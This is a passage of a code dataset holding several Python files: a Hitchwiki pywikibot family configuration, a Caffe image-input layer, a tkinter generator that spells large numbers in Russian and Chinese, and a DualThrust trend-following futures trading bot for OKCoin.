беседа',\n 'es' : u'Autostopwiki Discusión',\n 'fi' : u'Keskustelu Liftariwikiinista',\n 'nl' : u'Overleg Hitchwiki',\n }\n self.namespaces[14] = {\n '_default': u'Category',\n 'de': u'Kategorie',\n 'fr': u'Catégorie',\n 'ru': u'Категория',\n 'fi': u'Luokka',\n 'nl': u'Categorie',\n 'pl': u'Kategoria',\n 'pt': u'Categoria',\n 'ro': u'Categorie',\n 'ru': u'Категория',\n 'sv': u'Kategori',\n 'es': u'Categoría',\n 'bg': u'Категория',\n 'tr': u'Kategori',\n }\n\n# self.namespaces[1] = {\n# '_default': [u'Talk', self.namespaces[4]['_default']],\n# 'de': [u'Diskussion', self.namespaces[4]['_default']],\n# }\n# self.namespaces[2] = {\n# '_default': [u'User', self.namespaces[4]['_default']],\n# 'de': [u'Benutzer', self.namespaces[4]['_default']],\n# 'es': [u'Usuario', self.namespaces[4]['_default']],\n# }\n#\n# self.namespaces[4] = {\n# '_default': [u'Hitchwiki', self.namespaces[4]['_default']],\n# 'de' : [u'Tramperwiki', self.namespaces[4]['_default']],\n# }\n# self.namespaces[5] = {\n# '_default': [u'Hitchwiki talk', self.namespaces[5]['_default']],\n# 'de' : [u'Tramperwiki Diskussion', self.namespaces[4]['_default']],\n# }\n#\t\n# self.namespaces[14] = {\n# '_default': [u'Category', self.namespaces[4]['_default']],\n# 'de': [u'Kategorie', self.namespaces[4]['_default']],\n# }\n def hostname(self,code):\n return 'hitchwiki.org'\n\n def scriptpath(self, code):\n return '/%s/index.php' % code\n\n def apipath(self, code):\n return '/%s/api.php' % code\n\n def shared_image_repository(self, code):\n return ('en', 'en')\n\n def version(self, code):\n return 
\"1.19.2\"\n\n","sub_path":"families/hitchwiki_family.py","file_name":"hitchwiki_family.py","file_ext":"py","file_size_in_byte":4806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"423307313","text":"# -*- coding: utf-8 -*-\r\nfrom ..layer_operation import LayerOperation\r\nimport numpy as np\r\nfrom scipy.misc import imread\r\nfrom scipy.misc import imresize\r\nimport random\r\nimport csv\r\nimport sys\r\nimport caffe\r\nfrom caffe import layers as L\r\n\r\nfrom src.DLMDL.caffe_adaptor import tempNet # TODO: DLMDL에 solver 따로 만들거나 변경시 재검토 필요\r\n\r\nclass op_caffe_jpeg_input(LayerOperation):\r\n\r\n _attributes = \"\"\"[{\"default\": \"datasets\", \"source\": \"opt\", \"mandatory\": \"all\", \"name\": \"option\"}, {\"default\": \"jpg\", \"source\": \"opt\", \"mandatory\": \"all\", \"name\": \"file_format\"}, {\"source\": \"opt\", \"mandatory\": \"all\", \"name\": \"data_path\"}, {\"source\": \"opt\", \"mandatory\": \"all\", \"name\": \"label_path\"}, {\"source\": \"opt\", \"mandatory\": \"all\", \"name\": \"batch_size\"}, {\"source\": \"opt\", \"mandatory\": \"all\", \"name\": \"iteration\"}, {\"source\": \"layer\", \"mandatory\": \"all\", \"name\": \"image_size\"}, {\"source\": \"layer\", \"mandatory\": \"all\", \"name\": \"output_shape\"}]\"\"\"\r\n\r\n def compile_time_operation(self, learning_option, cluster):\r\n option = learning_option.get(\"option\", self.option)\r\n file_format = learning_option.get(\"file_format\", self.file_format)\r\n data_path = learning_option.get(\"data_path\", self.data_path)\r\n label_path = learning_option.get(\"label_path\", self.label_path)\r\n batch_size = learning_option.get(\"batch_size\", self.batch_size)\r\n iteration = learning_option.get(\"iteration\", self.iteration)\r\n image_size = self.image_size\r\n output_shape = self.output_shape\r\n \r\n # for shmcaffe\r\n #learning_option[\"move_rate\"] = learning_option.get(\"move_rate\", 0.2)\r\n #learning_option[\"tau\"] = learning_option.get(\"tau\", 1)\r\n\r\n # Phase checkpoint setting, PHASE: 0 for trian, 1 for test\r\n isTrainTest = 0\r\n if option.lower() == \"test\":\r\n temp_include = dict(phase=caffe.TEST)\r\n data_path = learning_option.get(\"test_data_path\", data_path)\r\n test_label_path = learning_option.get(\"test_label_path\", label_path)\r\n batch_size = learning_option.get(\"test_batch_size\", batch_size)\r\n elif option.lower() == \"datasets\":\r\n temp_include = dict(phase=caffe.TRAIN)\r\n elif option.lower() == \"train_test\":\r\n temp_include = dict(phase=caffe.TRAIN)\r\n isTrainTest = 1\r\n else:\r\n temp_include = dict(phase=caffe.TRAIN)\r\n\r\n # DB Data\r\n if file_format.lower() in [\"lmdb\", \"leveldb\"]:\r\n # Backend checkpoint setting, default value 0 (leveldb) for backend\r\n # Data layer setting\r\n image, label = L.Data(name=self.name, source=data_path,\r\n batch_size=batch_size, backend=(0 if file_format.lower()==\"leveldb\" else 1), include=temp_include, ntop=2)\r\n\r\n if isTrainTest == 1:\r\n data_path = learning_option.get(\"test_data_path\", data_path)\r\n batch_size = learning_option.get(\"test_batch_size\", batch_size)\r\n temp_image, temp_label = L.Data(name=self.name, source=data_path,\r\n batch_size=batch_size,\r\n backend=(0 if file_format.lower() == \"leveldb\" else 1),\r\n include=dict(phase=caffe.TEST), ntop=2)\r\n setattr(tempNet, str(self.name) + '.image', temp_image)\r\n setattr(tempNet, str(self.name) + '.label', temp_label)\r\n\r\n # Image Data\r\n # TODO: HDF5 와 같은 형식을 또 다른 개별 종륭의 layer 사용 가능하나 현재 raw image 파일 형식만 들어온다고 가정\r\n else :\r\n # Read and parse the source directory\r\n \r\n ''' for uninfo -twkim\r\n with open(data_path+'/'+label_path, 'r') as f:\r\n lines = f.readlines()\r\n new_lines = []\r\n for line 
in lines:\r\n new_lines.append('/'+line.split()[0]+'.'+file_format + ' ' + line.split()[1]+'\\n')\r\n with open(data_path+'/'+label_path.split('.')[0]+'_caffelist.txt', 'w') as f:\r\n f.writelines(new_lines)\r\n f.close()\r\n '''\r\n \r\n # Image Data layer setting\r\n image, label = L.ImageData(name=self.name,\r\n source=data_path + '/' + label_path.split('.')[0] + '_caffelist.txt',\r\n batch_size=batch_size, include=temp_include, ntop=2, root_folder=data_path,\r\n new_height=image_size[1], new_width=image_size[0])\r\n\r\n if isTrainTest == 1:\r\n data_path = learning_option.get(\"test_data_path\", data_path)\r\n batch_size = learning_option.get(\"test_batch_size\", batch_size)\r\n label_path = learning_option.get(\"test_label_path\", label_path)\r\n\r\n # Read and parse the source directory\r\n ''' for uninfo - twkim\r\n with open(data_path + '/' + label_path, 'r') as f:\r\n lines = f.readlines()\r\n new_lines = []\r\n for line in lines:\r\n new_lines.append('/' + line.split()[0] + '.' + file_format + ' ' + line.split()[1] + '\\n')\r\n with open(data_path + '/' + label_path.split('.')[0] + '_caffelist.txt', 'w') as f:\r\n f.writelines(new_lines)\r\n f.close()\r\n '''\r\n # Test image data layer setting\r\n temp_image, temp_label = L.ImageData(name=self.name,\r\n source=data_path + '/' + label_path.split('.')[0] + '_caffelist.txt',\r\n batch_size=batch_size, include=dict(phase=caffe.TEST), ntop=2,\r\n root_folder=data_path, new_height=image_size[1],\r\n new_width=image_size[0])\r\n setattr(tempNet, str(self.name) + '.image', temp_image)\r\n setattr(tempNet, str(self.name) + '.label', temp_label)\r\n\r\n # Record the layer output information\r\n self.set_output('image', image)\r\n self.set_output('label', label)\r\n self.set_dimension('image', image_size)\r\n try:\r\n if isTrainTest != 1:\r\n del learning_option['option']\r\n del learning_option['file_format']\r\n del learning_option['data_path']\r\n del learning_option['label_path']\r\n del learning_option['batch_size']\r\n del learning_option['iteration']\r\n learning_option['max_iter'] = iteration\r\n except KeyError:\r\n pass\r\n\r\n try:\r\n del learning_option['test_data_path']\r\n del learning_option['test_label_path']\r\n del learning_option['test_batch_size']\r\n learning_option['test_iter'] = learning_option.get(\"test_iteration\", 100)\r\n del learning_option['test_iteration']\r\n except KeyError:\r\n pass\r\n\r\n def run_time_operation(self, learning_option, cluster):\r\n pass\r\n","sub_path":"src/DLMDL/LayerOperation/caffe.old/jpeg_input.py","file_name":"jpeg_input.py","file_ext":"py","file_size_in_byte":7246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"326374896","text":"\"\"\"\nАвтор: Виктор Сюй © 2021\nАвтор имеет все права на использование, распространение, адаптацию, и т. п., касающиеся данной программы.\nПочта для обратной связи: viktor.p.xu@yandex.ru\n\"\"\"\n\nimport random\nfrom itertools import chain\nimport tkinter as tk\n\n\ndef generator():\n n = random.choices([p for p in range(10)], k=random.randint(4, 13))\n nu = ''\n for i in n:\n nu += str(i)\n return int(nu)\n\n\n# convert it to russian\nclass Russian:\n def __init__(self, o):\n self.dic1 = {1: 'один', 2: 'два', 3: 'три', 4: 'четыре', 5: 'пять', 6: 'шесть', 7: 'семь', 8: 'восемь',\n 9: 'девять'}\n self.dic2 = {10: 'десять', 11: \"одиннадцать\", 12: \"двенадцать\", 13: \"тринадцать\", 14: \"четырнадцать\",\n 15: \"пятнадцать\", 16: \"шестнадцать\", 17: \"семнадцать\", 18: \"восемнадцать\", 19: 'девятнадцать',\n 20: 'двадцать', 30: 'тридцать', 40: 'сорок', 50: 'пятьдесят', 60: 'шестьдесят', 70: 'семьдесят',\n 80: 'восемьдесят', 90: 'девяносто'}\n self.dic3 = {1: \"сто\", 2: 'двести', 3: 'триста', 4: 'четыреста', 5: 'пятьсот', 6: 'шестьсот', 7: 'семьсот',\n 8: 'восемьсот', 9: 'девятьсот'}\n self.dic4_1 = {1: 'тысяча', 2: 'миллион', 3: 'миллиард', 4: 'триллион'}\n self.dic4_2 = {1: 'тысячи', 2: 'миллиона', 3: 'миллиарда', 4: 'триллиона'}\n self.dic4_3 = {1: 'тысяч', 2: 'миллионов', 3: 'миллиардов', 4: 'триллионов'}\n self.o = o\n\n def _read_three(self, str_n):\n hun = int(str_n[0])\n rest = int(str_n[1:3])\n if self.dic2.get(rest) is not None:\n return (self.dic3.get(hun, '') + ' ' + self.dic2.get(rest, '')).lstrip(' ').replace(' ', ' ')\n else:\n temp = str(rest).rjust(2, '0')\n rest1 = int(temp[0]) * 10\n rest2 = int(temp[1])\n return (self.dic3.get(hun, '') + ' ' + self.dic2.get(rest1, '') + ' ' + self.dic1.get(rest2, '')) \\\n .lstrip(' ').replace(' ', ' ')\n\n def _gender(self, str_tho):\n li = str_tho.split(' ')\n if li[-1] == 'один':\n li[-1] = 'одна'\n elif li[-1] == 'два':\n li[-1] = 'две'\n return ' '.join(li)\n\n def _case(self, str_three):\n li = str_three.split(' ')\n case1 = ['один', \"одна\"]\n case2 = ['два', \"две\", \"три\", \"четыре\"]\n if li[-1] in case1:\n return self.dic4_1\n elif li[-1] in case2:\n return self.dic4_2\n else:\n return self.dic4_3\n\n def run(self):\n li = [i.rjust(3, '0') for i in format(self.o, ',').split(',')]\n ls = []\n un = []\n for k in li:\n ls.append(self._read_three(k))\n if len(li) == 1:\n return ' '.join(ls)\n elif len(li) >= 2:\n ls[-2] = self._gender(ls[-2])\n for i, item in enumerate(ls):\n un.append(self._case(item).get(len(li) - 1 - i, ''))\n return ' '.join(list(chain.from_iterable(zip(ls, un))))\n\n\nclass Chinese:\n def __init__(self, o):\n self.dic1 = {1: '一', 2: '二', 3: '三', 4: '四', 5: '五', 6: '六', 7: '七', 8: '八', 9: '九', 0: '零'}\n self.dic2 = {1: \"万\", 2: '亿', 3: '兆'}\n self.o = o\n\n def _str_split(self, o):\n s = str(o)\n li = list(s)\n leng = int(len(li) / 4)\n result = []\n for i in range(leng):\n temp = []\n for q in range(4):\n temp.append(li.pop())\n result.append(''.join(temp[::-1]).rjust(4, '0'))\n if any(li):\n result.append(''.join(li).rjust(4, '0'))\n return result[::-1]\n\n def _read_four(self, str_four):\n d1, d2, d3, d4 = str_four\n # n_r = str(int(str_four))\n r = self.dic1.get(int(d1), '') + '千' + self.dic1.get(int(d2), '') + '百' + self.dic1.get(int(d3), '') \\\n + '十' + self.dic1.get(int(d4), '')\n no_list = ['零千', '零百', '零十', '零零', '零零']\n for i in no_list:\n r = r.replace(i, '零')\n return r.rstrip('零').replace('二千','两千').replace('二百','两百')\n\n def run(self):\n li = 
self._str_split(str(self.o))\n ls = []\n un = []\n for i in li:\n ls.append(self._read_four(i))\n for k in range(len(li)):\n un.append(self.dic2.get(len(li) - 1 - k, ''))\n return ''.join(list(chain.from_iterable(zip(ls, un)))).lstrip('零')\n\n\nclass Show:\n def __init__(self):\n self.num = 0\n\n def update(self):\n self.num = generator()\n label_r = tk.Label(win, text=' '*30000 + '\\n' + ' '*30000, font=('Times New Roman', 15), wraplength=700)\n label_c = tk.Label(win, text=' '*30000 + '\\n' + ' '*30000, font=('Times New Roman', 15), wraplength=700)\n label_r.place(relx=0.5, rely=0.45, anchor='center')\n label_c.place(relx=0.5, rely=0.55, anchor='center')\n\n def show_number(self):\n r = tk.StringVar()\n r.set(format(self.num, ','))\n label_n = tk.Label(win, textvariable=r, font=('', 40), bg=win.cget('bg'), width=width, anchor='center')\n label_n.place(relx=0.5, rely=0.3, anchor='center')\n\n\n def show_russian(self):\n r_r = tk.StringVar()\n count_r = int(str(r_r).replace('PY_VAR', ''))\n label_r = tk.Label(win, text='', font=('Times New Roman', 15), wraplength=700)\n if int(count_r / 2) == count_r / 2:\n label_r['text'] = Russian(self.num).run()\n else:\n label_r['text'] = Russian(self.num).run() + '\\n' + Russian(self.num).run()\n label_r['fg'] = win.cget('bg')\n label_r.place(relx=0.5, rely=0.45, anchor='center')\n\n def show_chinese(self):\n c_r = tk.StringVar()\n count_c = int(str(c_r).replace('PY_VAR', ''))\n label_c = tk.Label(win, text='', font=('Times New Roman', 15), wraplength=700)\n if int(count_c / 2) == count_c / 2:\n label_c['text'] = Chinese(self.num).run()\n else:\n label_c['text'] = Chinese(self.num).run()\n label_c['fg'] = win.cget('bg')\n label_c.place(relx=0.5, rely=0.55, anchor='center')\n\n\nif __name__ == '__main__':\n win = tk.Tk()\n win.title('Big Number Generator')\n width = 800\n height = 600\n win.geometry(f'{width}x{height}')\n label0 = tk.Label(win, text=\"Big Number Generator\", font=('Times New Roman', 30))\n label0.place(relx=0.5, rely=0.15, anchor='center')\n label1 = tk.Label(win, text=\"Автор: Виктор Сюй © 2021\\nАвтор имеет все права на использование, распространение, \"\n \"адаптацию, и т. п., касающиеся данной программы.\\nПочта для обратной связи: \"\n \"viktor.p.xu@yandex.ru\")\n label1.place(relx=0.5, rely=0.9, anchor='center')\n show = Show()\n button0 = tk.Button(win, text='Generate', command=lambda: [show.update(), show.show_number()])\n button0.place(relx=0.5, rely=0.7, anchor='center')\n button_r = tk.Button(win, text='Русский', command=lambda: show.show_russian())\n button_r.place(relx=0.3, rely=0.7, anchor='center')\n button_c = tk.Button(win, text='中文', command=lambda: show.show_chinese())\n button_c.place(relx=0.7, rely=0.7, anchor='center')\n win.mainloop()\n","sub_path":"Project003——bignumber/big_number_generator/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":7913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
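The two converters above differ mainly in digit grouping: the Russian path scales by 10^3 (тысяча, миллион, ...) while the Chinese path scales by 10^4 (万, 亿, ...). A small stdlib sketch of just that grouping step, which both classes rely on:

```python
def group_digits(n, size):
    """Split a non-negative int into zero-padded groups of `size` digits."""
    s = str(n)
    groups = []
    while s:
        groups.append(s[-size:].rjust(size, '0'))
        s = s[:-size]
    return groups[::-1]


print(group_digits(1234567, 3))  # ['001', '234', '567'] -> thousands scale
print(group_digits(1234567, 4))  # ['0123', '4567']      -> wan (10^4) scale
```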
+{"seq_id":"455530857","text":"from concurrent.futures import ThreadPoolExecutor\nimport time,datetime\nimport collections\nimport sys, os, traceback\nimport logging\nfrom abc import ABC, abstractmethod\n\nsys.path.append('D:\\BitCoin\\Code\\codebase')\nfrom helpText import errorTexts, statusTexts\nfrom util import createLogger\nfrom utilTrade import getKline\nfrom utilException import catchExceptionDecorator, catchMethodExceptionDecorator\nfrom collections import namedtuple\n\n\nglobalTrendTrading = False\n\nclass TradeSide:\n Long = 'Long'\n Short = 'Short'\n def otherSide(side):\n if side == TradeSide.Long:\n return TradeSide.Short\n elif side == TradeSide.Short:\n return TradeSide.Long\n else:\n print('Error in TradeSide.otherSide({})'.format(side))\nPosition = namedtuple('Position', ['side', 'price'])\n\nclass SlarkBase(ABC):\n def __init__(self, exch, logLevel, symbol, contractType, cfg, name):\n self.logger = createLogger(symbol, logLevel)\n self.symbol = symbol\n self.contractType = contractType\n self.name = name\n self.createExch(exch)\n self.initializeCfg(cfg) # call the derived methods\n self.initialize()\n self.logger.info('****************************************************************')\n self.logger.info('********************* New Test Starts ************************')\n self.logger.info('****************************************************************')\n self.logger.info('{} instance initialized successfully.'.format(self.name))\n\n @abstractmethod\n def createExch(self, exch):\n pass\n @abstractmethod\n def initializeCfg(self, cfg):\n pass\n @abstractmethod\n def initialize(self):\n pass\n\nclass SlarkTrend(SlarkBase):\n def __init__(self, exch, logger, symbol, contractType, cfg, name):\n super(SlarkTrend, self).__init__(exch, logger, symbol, contractType, cfg, name)\n def initialize(self):\n self.highestFromPosition = 0\n self.lowestFromPosition = 0\n self.__updateMktData()\n self.state = 'NULL'\n # (TradeSide, tradePrice[, amount]) 最终是要在一个进程或者系统里面管理所有的position和信号,还是需要有position的其他信息\n self.position = None \n\n def createExch(self, exch):\n self.traderTrend = exch.okexExchTrade()\n self.account = exch.okexExchAccount()\n self.marketData = exch.okexExchMarketData()\n self.logger.info('SlarkTrend exchanges traderTrend, account and marketData, have been initialized successfully.')\n\n def initializeCfg(self, cfg):\n self.cfgMktDataUpdateIntervalInMinute = int(cfg.get(self.symbol+self.name, 'mktDataUpdateIntervalInMinute'))\n self.cfgPastIntervalNumber = int(cfg.get(self.symbol+self.name, 'pastIntervalNumber'))\n self.cfgKBull = float(cfg.get(self.symbol+self.name, 'kBull'))\n self.cfgKBear = float(cfg.get(self.symbol+self.name, 'kBear'))\n self.cfgBullFlipRatio = float(cfg.get(self.symbol+self.name, 'bullFlipRatio'))\n\n #def __updateUserInfo(self):\n # symbolInfo = self.account.future_userinfo()['info'][self.symbol[0:3]]\n # free = symbolInfo['account_rights']\n # self.coin = free[]\n # self.cny = free['cny']\n\n @catchMethodExceptionDecorator\n def __updateBenchLine(self):\n histData = self.marketData.future_kline(self.symbol, self.contractType, '1min', self.cfgMktDataUpdateIntervalInMinute * self.cfgPastIntervalNumber)\n histHighestPrice = max([x[2] for x in histData])\n histLowestPrice = min([x[3] for x in histData])\n histHighestClose = max([x[4] for x in histData])\n histLowestClose = min([x[4] for x in histData])\n self.bullRange = histHighestPrice - histLowestClose\n self.bearRange = histLowestPrice - histHighestClose\n self.currentIntervalStartPrice = 
self.currentPrice\n self.bullTradeEntry = self.currentIntervalStartPrice + self.bullRange * self.cfgKBull\n self.stopLoseMoneyPriceLong = self.bullRange * self.cfgKBull / 2 # 多仓下跌的平仓价差\n self.bearTradeEntry = self.currentIntervalStartPrice + self.bearRange * self.cfgKBear\n self.stopLoseMoneyPriceShort = self.bearRange * self.cfgKBear / 2 # 空仓上涨的平仓价差\n # 这里不设置state为NULL的原因:\n # \t如果之前是bull,在高位买,更新bench后,NULL下的bear线太低,承担整个价差的亏损;\n #\t\t如果新的currentIntervalStartPrice的价格过高,就会导致止损价格太高,立刻止损\n # 现在使用新的标准进行平仓,原来的理由不成立;设置为NULL可以更灵敏:达到新的bearEntry和降低超过stopLose 都会触发平仓\n # 前一种情况也可以减少损失;但到底是否是多头?还是说如果处于多头空间,不改状态,不开空仓?\n self.state = 'NULL' \n self.logger.info('UpdateBenchLine StartPrice: {:.2f}, bullEntry: {:.2f}, bearEntry: {:.2f}\\n\\\n bullRange: {:.2f}, bearRange: {:.2f}, stopLoseLong: {:.2f}, stopLoseShort: {:.2f}'.format(\n self.currentIntervalStartPrice, self.bullTradeEntry, self.bearTradeEntry, \n self.bullRange, self.bearRange, self.stopLoseMoneyPriceLong, self.stopLoseMoneyPriceShort))\n self.updatedBenchLineInPastIntervalFlag = True\n\n @catchMethodExceptionDecorator\n def updateBenchLineTimly(self):\n intervalVal = 0\n self.__updateBenchLine()\n global globalTrendTrading\n globalTrendTrading = True\n while True:\n while intervalVal == int((datetime.datetime.now().minute + datetime.datetime.now().hour * 60)/ self.cfgMktDataUpdateIntervalInMinute + 1):\n time.sleep(self.cfgMktDataUpdateIntervalInMinute) # sleep second\n intervalVal = int((datetime.datetime.now().minute + datetime.datetime.now().hour * 60)/ self.cfgMktDataUpdateIntervalInMinute + 1)\n self.__updateMktData()\n if not self.updatedBenchLineInPastIntervalFlag:\n self.logger.info(''.center(100, '-'))\n self.logger.info('Timly update bench line')\n self.__updateBenchLine()\n self.updatedBenchLineInPastIntervalFlag = False\n\n def __updateMktData(self):\n \"\"\"\n Prices is the time value sequence. Control the frequency! 
Or most slots are repeat!\n \"\"\"\n orderBook = self.marketData.future_depth(self.symbol, self.contractType, 15)\n self.bids = orderBook['bids']\n self.asks = orderBook['asks']\n self.bidPrice = self.bids[0][0]\n self.askPrice = self.asks[0][0]\n spread = self.askPrice - self.bidPrice\n self.askPrice -= 0.1 * spread\n self.bidPrice += 0.1 * spread\n self.currentPrice = (self.bidPrice + self.askPrice) / 2\n # highestFromPosition只在 processBULL()使用;processBULL()时候肯定有position,所以用这个值时候一定有position\n if self.currentPrice > self.highestFromPosition:\n self.highestFromPosition = self.currentPrice\n if self.currentPrice < self.lowestFromPosition:\n self.lowestFromPosition = self.currentPrice\n\n def unidirectional2InPast5Mins(self, state):\n \"\"\"\n Detect decrease 2 percents in the past 5mins if self.state == 'BULL'\n or increase 2 percents in the past 5mins if self.state == 'BEAR'\n \"\"\"\n histData = self.marketData.future_kline(self.symbol, dataType='1min', size = 5)\n histHighestPrice = max([x[2] for x in histData])\n histLowestPrice = min([x[2] for x in histData])\n ret = False\n ratio1 = self.currentPrice / histHighestPrice\n ratio2 = self.currentPrice / histLowestPrice \n if ('BULL' == state and ratio1 < 0.99) or \\\n ('BEAR' == state and ratio2 > 1.01):\n ret = True\n if ret:\n self.logger.info(''.center(100, '-'))\n if 'BULL' == self.state:\n self.logger.info('Down 2 percents in the past 5 minutes, current {} / highest {} = {}'.format(\n self.currentPrice, histHighestPrice, ratio1))\n else:\n self.logger.info('UP 2 percents in the past 5 minutes, current {} / lowest {} = {}'.format(\n self.currentPrice, histLowestPrice, ratio2))\n self.logger.info('histData {}'.format(histData))\n return ret\n\n def down3FromHighest(self):\n ratio = self.currentPrice / self.highestFromPosition\n if ratio < 0.97:\n self.logger.info(''.center(100, '-'))\n self.logger.info('Down 3 percents from the highest price, current {} / highest {} = {}'.format(\n self.currentPrice, self.highestFromPosition, ratio))\n return True\n return False\n\n def up3FromLowest(self):\n ratio = self.currentPrice / self.lowestFromPosition\n if ratio > 1.03:\n self.logger.info(''.center(100, '-'))\n self.logger.info('Up 3 percents from the lowest price, current {} / lowest {} = {}'.format(\n self.currentPrice, self.lowestFromPosition, ratio))\n return True\n return False\n\n def processNULL(self):\n # test and close current position\n # 这个stopLoseMoney相当于限制亏损,即从start移动n%的时候开仓\n # 如果从tradePrice反向移动n%/2的时候平仓,不会承受所有[start, openPosition]之间的亏损\n # stopLoseMoneyPriceShort is negative!\n if self.position:\n if TradeSide.Long == self.position['side']:\n if self.position['price'] - self.currentPrice > self.stopLoseMoneyPriceLong: \n self.logger.info(''.center(100, '-'))\n self.logger.info('Long stop lose money @ NULL')\n self.closePositionExecutor(TradeSide.Long)\n elif TradeSide.Short == self.position['side']:\n if self.position['price'] - self.currentPrice < self.stopLoseMoneyPriceShort:\n self.logger.info(''.center(100, '-'))\n self.logger.info('Short stop lose money @ NULL')\n self.closePositionExecutor(TradeSide.Short)\n else:\n self.logger.critical('Strange position {} in processNull.'.format(self.position))\n # 也有情况是,更新benchLine之后,startPrice > 原来的BULL线,这时候到新的bearEntry应该首先平仓,再开仓\n # 但是这样极端改变真的好?】在之前的BULL状态,同时在新的BEAR状态\n # test and enter a new state\n if self.currentPrice > self.bullTradeEntry:\n self.logger.info(''.center(100, '-'))\n self.logger.info('CurrentPrice {:.2f} is higher than bullTradeEntry {:.2f}'.format(\n 
self.currentPrice, self.bullTradeEntry))\n if self.position and self.position['side'] == TradeSide.Long:\n self.logger.info('Keep BULL @ NULL')\n else:\n self.trade(TradeSide.Long)\n self.__updateBenchLine()\n self.state = 'BULL' # updateBenchLine() 設置self.state為NULL,但這裡updateBenchLine()之後需要設置 state 為BULL\n elif self.currentPrice < self.bearTradeEntry:\n self.logger.info(''.center(100, '-'))\n self.logger.info('CurrentPrice {:.2f} is lower than bearTradeEntry {:.2f}'.format(\n self.currentPrice, self.bearTradeEntry))\n if self.position and self.position['side'] == TradeSide.Short:\n self.logger.info('Keep BEAR @ NULL')\n else:\n self.trade(TradeSide.Short) # In case of hold position, udpate benchmark and state\n self.__updateBenchLine()\n self.state = 'BEAR'\n else:\n pass\n #print('random walk between [BearEntry, BullEntry]')\n\n def processBULL(self):\n if self.currentPrice < self.bullTradeEntry:\n self.state = 'NULL'\n if self.position and TradeSide.Long == self.position['side']:\n # 止损\n if self.position['price'] - self.currentPrice > self.stopLoseMoneyPriceLong: \n self.logger.info(''.center(100, '-'))\n self.logger.info('Long stop lose money @ BULL')\n self.closePositionExecutor(TradeSide.Long)\n self.__updateBenchLine()\n # 止盈\n elif self.unidirectional2InPast5Mins(self.state) or self.down3FromHighest():\n self.closePositionExecutor(TradeSide.Long)\n self.__updateBenchLine()\n else:\n self.logger.info(''.center(100, '-'))\n self.logger.info('Keep BULL @ BULL')\n else:\n self.logger.info(''.center(100, '-'))\n self.logger.critical('No position in BULL state')\n\n def processBEAR(self):\n if self.currentPrice > self.bearTradeEntry:\n self.state = 'NULL'\n if self.position and TradeSide.Short == self.position['side']:\n if (self.position['price'] - self.currentPrice < self.stopLoseMoneyPriceShort):\n self.logger.info(''.center(100, '-'))\n self.logger.info('Short stop lose money @ BEAR')\n self.closePositionExecutor(TradeSide.Short)\n self.__updateBenchLine()\n elif self.unidirectional2InPast5Mins(self.state) or self.up3FromLowest():\n self.closePositionExecutor(TradeSide.Short)\n self.__updateBenchLine()\n else:\n self.logger.info(''.center(100, '-'))\n self.logger.info('Keep BEAR @ BEAR')\n else:\n self.logger.info(''.center(100, '-'))\n self.logger.critical('No position in BEAR state')\n\n def makeDecision(self):\n @catchMethodExceptionDecorator\n def makeDecisionHelper(self):\n self.__updateMktData()\n if self.state == 'NULL':\n self.processNULL()\n elif self.state == 'BULL':\n self.processBULL()\n elif self.state == 'BEAR':\n self.processBEAR()\n else:\n self.logger.critical('strange state {}'.format(self.state))\n while True:\n makeDecisionHelper(self)\n time.sleep(0.05) # If in high frequency, return 10001\n\n def closePositionExecutor(self, side):\n \"\"\"\n Only execute. 
Verification should be done by the caller.\n If close LONG position, should be SELL, so trade price should be askPrice.\n \"\"\"\n tradePrice = self.askPrice if (side == TradeSide.Long) else self.bidPrice\n if side == TradeSide.Long:\n initiateSide = 'buy'\n closeSide = 'sell'\n else:\n initiateSide = 'sell'\n closeSide = 'buy'\n self.logger.info('Close position: {}@{:.2f} - {}@{:.2f}'.format(\n initiateSide, self.position['price'], closeSide, tradePrice))\n self.logger.info('current {:.2f}, bid {:.2f}, ask {:.2f}'.format(self.currentPrice, self.bidPrice, self.askPrice))\n self.position = None # 反向交易,而不是cancel order【实盘交易时候肯定要考虑这个单子是否能成交】\n self.state = 'NULL'\n\n def closePosition(self, side):\n if self.position == None:\n self.logger.info('Dummy closePosition.')\n elif 'side' in self.position and self.position['side'] == side:\n self.closePositionExecutor(side)\n else:\n self.logger.critical('Current position is {} while want to close {} position.'.format(self.position, side))\n\n @catchMethodExceptionDecorator\n def trade(self, side):\n # 自己维持交易信息,开仓价格和仓位,便于closePositionExecutor()使用;官方参考价为ask价格,目前kline()具有一定误差,但可以接受\n # tradePrice与市场价之间的差?\n # 要打log\n self.__updateMktData()\n tradePrice = self.bidPrice if (side == TradeSide.Long) else self.askPrice\n self.closePosition(TradeSide.otherSide(side))\n #tradeAmount = self.coin if (side == 'sell') else self.cny / tradePrice\n #if abs(self.asks[0][0] - self.bids[0][0]) > self.currentPrice * 0.001: tradeAmount *= 0.9\n #if abs(self.asks[0][0] - self.bids[0][0]) > self.currentPrice * 0.002: tradeAmount *= 0.9\n #if abs(self.asks[0][0] - self.bids[0][0]) > self.currentPrice * 0.003: tradeAmount *= 0.9\n #self.position = {'side':side, 'price':tradePrice, 'amount': tradeAmount}\n self.position = {'side':side, 'price':tradePrice}\n self.highestFromPosition = self.currentPrice\n self.lowestFromPosition = self.currentPrice\n self.logger.info('{} {} at {:.2f}'.format(side, self.symbol.upper(), tradePrice))\n\nclass Slark:\n def trade(exch, symbol, contractType, cfg):\n global globalTrendTrading\n slarkTrend = SlarkTrend(exch, logging.INFO, symbol, contractType, cfg, 'BigTrend')\n try:\n with ThreadPoolExecutor(max_workers=2) as executor:\n executor.submit(slarkTrend.updateBenchLineTimly)\n while not globalTrendTrading:\n time.sleep(1)\n continue\n executor.submit(slarkTrend.makeDecision)\n except Exception as e:\n logger = createLogger('Slark', logging.INFO)\n logger.critical(e)\n logger.critical(traceback.format_exc())\n logger.critical('status')\n insts = [slarkTrend]\n for inst in insts:\n for item in inst.__dict__.items():\n inst.logger.critical('self.%s: %s'%(item[0], str(item[1])))\n ","sub_path":"btcTradingSystem/OKCoin/Code/SlarkMultithreadInstance/DualThrust_BigTrend/DualThrust_Spot_BigTrend_Future.py","file_name":"DualThrust_Spot_BigTrend_Future.py","file_ext":"py","file_size_in_byte":16272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
